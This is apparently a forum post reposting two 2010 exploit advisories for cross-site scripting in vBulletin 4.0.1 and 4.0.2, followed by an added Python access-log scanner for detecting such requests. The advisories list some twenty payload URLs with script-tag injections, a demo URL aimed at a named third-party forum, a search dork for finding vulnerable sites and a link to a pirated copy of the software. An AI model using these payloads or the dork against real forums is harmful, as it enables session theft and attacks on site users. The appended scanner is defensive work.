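In the name of God, the Most Gracious, the Most Merciful
Praise be to God, and peace and blessings be upon the Messenger of God and upon all his family and companions
Peace be upon you, and the mercy and blessings of God
Here are the vulnerabilities
PHP code: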
===================================
vBulletin v 4.0.1 XSS Vulnerability
===================================
[+] Script: vBulletin Version 4.0.1
[+] Vendor: www.vbulletin.com
[+] Author: W4n73d
[~] Bug: Cross Site Scripting (XSS)
[~] Exploit: http://[HOST]/forum/calendar.php="***************("! XSS
!");</script>
[~] Demo: http://www.overbr.com.br/forum/calendar.php="***************("! XSS
!");</script>
# Inj3ct0r.com [2010-02-15]
PHP code:
==========================================
vBulletin Version 4.0.2 Xss Vulnerability
==========================================
========================================================================================
| # Title : vBulletin Version 4.0.2 Cross Site Scripting in URI Vulnerability
| # Author : indoushka
| # Web Site : http://www.digzip.com/files/54QE0JXS/vbulletin_4.0.2nulledfinal.rar
| # Dork : Powered by vBulletin? Version 4.0.2
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)
| # Bug : XSS
====================== Exploit By indoushka =================================
# Exploit :
http://127.0.0.1/upload/calendar.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/faq.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/forum.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/usercp.php/>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/subscription.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/showthread.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/showgroups.php/>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/sendmessage.php/>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/search.php/>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/register.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/profile.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/private.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/online.php/>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/newthread.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/misc.php/>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/memberlist.php?=>"'>***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/member.php/>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/inlinemod.php?acuparam=>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/index.php/>">***************(213771818860)</ScRiPt>
http://127.0.0.1/upload/forumdisplay.php?acuparam=>">***************(213771818860)</ScRiPt>
# Inj3ct0r.com [2010-02-20]
Coming soon: a lesson on exploiting XSS vulnerabilities
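A defender's view of the request shapes listed in the two advisories above, as an added example that is not part of the original post: a Python scanner for combined-format access logs that flags requests to `.php` scripts whose query string or trailing path decodes to HTML markup characters. The log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SPLIT = re.compile(r'^(.*?\.php)(.*)$', re.IGNORECASE)  # script name, then the rest
MARKUP = re.compile(r'[<>"]')                           # can close an attribute or tag
SCRIPT_TAG = re.compile(r'<\s*/?\s*script', re.IGNORECASE)

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Feb/2010:10:00:01 +0000] "GET /upload/faq.php?acuparam=%3E%22%3E%3CScRiPt%3E1%3C/ScRiPt%3E HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.10 - - [20/Feb/2010:10:00:02 +0000] "GET /upload/usercp.php/%253E%2522%253E%253CScRiPt%253E1%253C/ScRiPt%253E HTTP/1.1" 200 4096 "-" "-"',
    '198.51.100.7 - - [20/Feb/2010:10:00:03 +0000] "GET /upload/showthread.php?t=42&page=2 HTTP/1.1" 200 9000 "-" "-"',
    '198.51.100.7 - - [20/Feb/2010:10:00:04 +0000] "GET /upload/calendar.php=%22x HTTP/1.1" 200 9000 "-" "-"',
]

def decode(text, rounds=3):
    """Percent-decode repeatedly so double-encoded markup is still seen."""
    for _ in range(rounds):
        nxt = unquote(text)
        if nxt == text:
            break
        text = nxt
    return text

def classify(line):
    """Return (script, where, reason) for a suspicious request, else None."""
    m = REQUEST.search(line)
    parts = SPLIT.match(m.group(1)) if m else None
    if not parts:
        return None
    script, raw_tail = parts.groups()
    tail = decode(raw_tail)
    if not MARKUP.search(tail):
        return None
    # "path" covers anything appended to the script name that is not a query string.
    where = "query" if raw_tail.startswith("?") else "path"
    reason = "script-tag" if SCRIPT_TAG.search(tail) else "markup-chars"
    return script, where, reason

def scan(lines):
    """Return (client, script, where, reason) for every flagged line."""
    verdicts = ((line.split(" ", 1)[0], classify(line)) for line in lines)
    return [(ip,) + v for ip, v in verdicts if v]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A hit means a client sent markup in the URL, not that the page reflected it; confirming exposure still requires checking whether the response echoes the value without HTML-escaping it.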